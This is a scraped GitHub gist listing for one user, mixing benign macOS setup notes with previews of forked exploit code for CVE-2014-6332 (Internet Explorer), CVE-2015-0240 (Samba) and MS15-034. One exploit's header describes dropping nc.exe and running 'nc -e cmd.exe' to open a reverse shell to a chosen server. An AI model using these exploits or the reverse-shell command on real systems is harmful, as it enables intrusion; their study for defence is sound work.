Skip to content

Instantly share code, notes, and snippets.

charlyborwn

Block or report user

Report or block charlyborwn

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@charlyborwn
charlyborwn / remove_postgres_on_mac_os.md
Created May 23, 2019 — forked from Atlas7/remove_postgres_on_mac_os.md
Note - How completely uninstall PostgreSQL 9.X on Mac OSX
View remove_postgres_on_mac_os.md

This blog post has helped me clean up my postgres development environment on Mac. So making a copy!

How completely uninstall PostgreSQL 9.X on Mac OSX

This article is referenced from stackoverflow:

If installed PostgreSQL with homebrew , enter brew uninstall postgresql

If you used the EnterpriseDB installer , follow the following step.
@charlyborwn
charlyborwn / iterm2-solarized.md
Created Mar 21, 2019 — forked from kevin-smets/iterm2-solarized.md
iTerm2 + Oh My Zsh + Solarized color scheme + Meslo powerline font + [Powerlevel9k] - (macOS)
View iterm2-solarized.md

Default

Default

Powerlevel9k

Powerlevel9k

@charlyborwn
charlyborwn / osx_setup.sh
Created Nov 14, 2018 — forked from avayanis/osx_setup.sh
Bootstrap a new Mac
View osx_setup.sh
#!/bin/bash
# Define script directories
TMP="/tmp/osx_setup"
# Package Versions
NODEVERSION="0.12.5"
# Introduction to setup
echo "Preparing to setup:"
View gist:8205342f848c0f76d1f7f321cce4ab6a
DWORD Error, bytesIO;
NTSTATUS Status;
HANDLE hProcessToken = NULL, hNewToken = NULL, hTest;
BOOL bCond = FALSE;
SHELLEXECUTEINFO shinfo;
SID_IDENTIFIER_AUTHORITY MLAuthority = SECURITY_MANDATORY_LABEL_AUTHORITY;
TOKEN_MANDATORY_LABEL tml, *ptml;
PSID pIntegritySid = NULL;
STARTUPINFO si;
PROCESS_INFORMATION pi;
View SafeArrayRedim.cpp
/*
* reversed SafeArrayRedim() in oldaut32.dll (Windows XP)
* for CVE-2014-6332
*/
typedef struct tagSAFEARRAY
{
USHORT cDims; // number of dimensions
USHORT fFeatures; // type of elements
ULONG cbElements; // byte size per element
@charlyborwn
charlyborwn / cve-2014-6332_win7_ie11_poc.html
Last active May 23, 2017 — forked from worawit/cve-2014-6332_win7_ie11_poc.html
CVE-2014-6332 PoC to get shell or bypass protected mode
View cve-2014-6332_win7_ie11_poc.html
<html>
<head>
<!--
CVE-2014-6332 PoC to get meterpreter shell or bypass IE protected mode
- Tested on IE11 + Windows 7 64-bit
References:
- original PoC - http://www.exploit-db.com/exploits/35229/
- http://blog.trendmicro.com/trendlabs-security-intelligence/a-killer-combo-critical-vulnerability-and-godmode-exploitation-on-cve-2014-6332/
- http://security.coverity.com/blog/2014/Nov/eric-lippert-dissects-cve-2014-6332-a-19-year-old-microsoft-bug.html
@charlyborwn
charlyborwn / cve-2014-6332_exploit.html
Created May 23, 2017 — forked from worawit/cve-2014-6332_exploit.html
CVE-2014-6332 IE exploit to get shell (packed everything in one html)
View cve-2014-6332_exploit.html
<html>
<head>
<!--
CVE-2014-6332 exploit to bypass IE protected mode if enabled (with localhost) then get shell
The exploit drops nc.exe then execute "nc -e cmd.exe -n ip port"
'server_ip' and 'server_port' in javascript below determined the connect back target
Tested on
- IE11 + Windows 7 64-bit (EPM is off)
- IE11 + Windoes 8.1 64-bit (EPM is off)
@charlyborwn
charlyborwn / cve-2015-0240_samba_poc
Created May 23, 2017 — forked from worawit/cve-2015-0240_samba_poc
PoC for Samba vulnerabilty (CVE-2015-0240)
View cve-2015-0240_samba_poc
#!/usr/bin/python
"""
PoC for Samba vulnerabilty (CVE-2015-0240) by sleepya
This PoC does only triggering the bug
Reference:
- https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/
#################
Exploitability against CentOS/Ubuntu binaries
@charlyborwn
charlyborwn / cve-2015-0240_samba_exploit.py
Created May 23, 2017 — forked from worawit/cve-2015-0240_samba_exploit.py
Exploit for Samba vulnerabilty (CVE-2015-0240)
View cve-2015-0240_samba_exploit.py
#!/usr/bin/python
"""
Exploit for Samba vulnerabilty (CVE-2015-0240) by sleepya
The exploit only targets vulnerable x86 smbd <3.6.24 which 'creds' is controlled by
ReferentID field of PrimaryName (ServerName). That means '_talloc_zero()'
in libtalloc does not write a value on 'creds' address.
Reference:
- https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/
@charlyborwn
charlyborwn / http_sys_pseudo.c
Created May 23, 2017 — forked from worawit/http_sys_pseudo.c
MS15-034 (CVE-2015-1635) PoCs
View http_sys_pseudo.c
/*
Pseudo code in HTTP.sys to understand flow related to MS15-034
All pseudo code are reversed from vulnerable HTTP.sys on Windows 7 SP1 x86
For anyone want to know what function are patched.
Just open patched version and find all functions reference to RtlULongLongAdd().
*/
You can’t perform that action at this time.